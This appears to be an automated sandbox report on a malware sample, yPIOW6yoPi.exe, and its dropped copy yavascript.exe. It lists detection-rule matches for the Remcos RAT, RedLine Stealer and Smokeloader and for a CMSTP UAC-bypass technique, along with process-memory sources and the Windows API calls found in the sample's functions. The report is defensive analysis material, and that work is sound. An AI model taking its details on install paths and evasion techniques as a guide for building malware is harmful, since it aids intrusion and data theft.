            Source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000014.00000002.2309360524.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000026.00000002.2378502507.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000011.00000002.4624113726.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,0_2_0041CA9E
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,0_2_0041ACC1
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,0_2_0041ACED
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0210AF28 OpenProcess,NtSuspendProcess,CloseHandle,0_2_0210AF28
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0210AF54 OpenProcess,NtResumeProcess,CloseHandle,0_2_0210AF54
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0210CD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,0_2_0210CD05
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,17_2_0041CA9E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,17_2_0041ACC1
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,17_2_0041ACED
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0076CD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,17_2_0076CD05
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0076AF54 OpenProcess,NtResumeProcess,CloseHandle,17_2_0076AF54
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0076AF28 OpenProcess,NtSuspendProcess,CloseHandle,17_2_0076AF28
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,20_2_0041CA9E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,20_2_0041ACC1
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,20_2_0041ACED
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0214AF28 OpenProcess,NtSuspendProcess,CloseHandle,20_2_0214AF28
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0214AF54 OpenProcess,NtResumeProcess,CloseHandle,20_2_0214AF54
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0214CD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,20_2_0214CD05
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0041CA9E NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,38_2_0041CA9E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,38_2_0041ACC1
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,38_2_0041ACED
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0219AF28 OpenProcess,NtSuspendProcess,CloseHandle,38_2_0219AF28
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0219AF54 OpenProcess,NtResumeProcess,CloseHandle,38_2_0219AF54
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0219CD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,38_2_0219CD05
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_004158B9
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_02105B1C ExitWindowsEx,LoadLibraryA,GetProcAddress,0_2_02105B1C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,17_2_004158B9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00765B1C ExitWindowsEx,LoadLibraryA,GetProcAddress,17_2_00765B1C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,20_2_004158B9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02145B1C ExitWindowsEx,LoadLibraryA,GetProcAddress,20_2_02145B1C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,38_2_004158B9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02195B1C ExitWindowsEx,LoadLibraryA,GetProcAddress,38_2_02195B1C
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041D0710_2_0041D071
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004520D20_2_004520D2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0043D0980_2_0043D098
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004371500_2_00437150
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004361AA0_2_004361AA
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004262540_2_00426254
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004313770_2_00431377
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041E5DF0_2_0041E5DF
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0044C7390_2_0044C739
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004267CB0_2_004267CB
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0043C9DD0_2_0043C9DD
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00432A490_2_00432A49
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0043CC0C0_2_0043CC0C
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00434D220_2_00434D22
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00426E730_2_00426E73
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00440E200_2_00440E20
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0043CE3B0_2_0043CE3B
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00412F450_2_00412F45
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00452F000_2_00452F00
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00426FAD0_2_00426FAD
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_021172140_2_02117214
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0210D2D80_2_0210D2D8
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0212D2FF0_2_0212D2FF
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_021423390_2_02142339
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_021273B70_2_021273B7
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_021310870_2_02131087
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0212D0A20_2_0212D0A2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_021170DA0_2_021170DA
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_021264110_2_02126411
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_021164BB0_2_021164BB
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_02116A320_2_02116A32
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0210E8460_2_0210E846
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0212CE730_2_0212CE73
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0212CC440_2_0212CC44
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_02122CB00_2_02122CB0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0041D07117_2_0041D071
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_004520D217_2_004520D2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0043D09817_2_0043D098
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0043715017_2_00437150
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_004361AA17_2_004361AA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0042625417_2_00426254
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0043137717_2_00431377
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0041E5DF17_2_0041E5DF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0044C73917_2_0044C739
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_004267CB17_2_004267CB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0043C9DD17_2_0043C9DD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00432A4917_2_00432A49
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0043CC0C17_2_0043CC0C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00434D2217_2_00434D22
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00426E7317_2_00426E73
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00440E2017_2_00440E20
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0043CE3B17_2_0043CE3B
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00412F4517_2_00412F45
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00452F0017_2_00452F00
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00426FAD17_2_00426FAD
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_007770DA17_2_007770DA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0078D0A217_2_0078D0A2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0079108717_2_00791087
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0077721417_2_00777214
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0078D2FF17_2_0078D2FF
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0076D2D817_2_0076D2D8
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_007A233917_2_007A2339
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_007873B717_2_007873B7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0078641117_2_00786411
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_007764BB17_2_007764BB
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0076E84617_2_0076E846
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00776A3217_2_00776A32
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0078CC4417_2_0078CC44
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00782CB017_2_00782CB0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0078CE7317_2_0078CE73
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0041D07120_2_0041D071
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_004520D220_2_004520D2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0043D09820_2_0043D098
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0043715020_2_00437150
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_004361AA20_2_004361AA
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0042625420_2_00426254
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0043137720_2_00431377
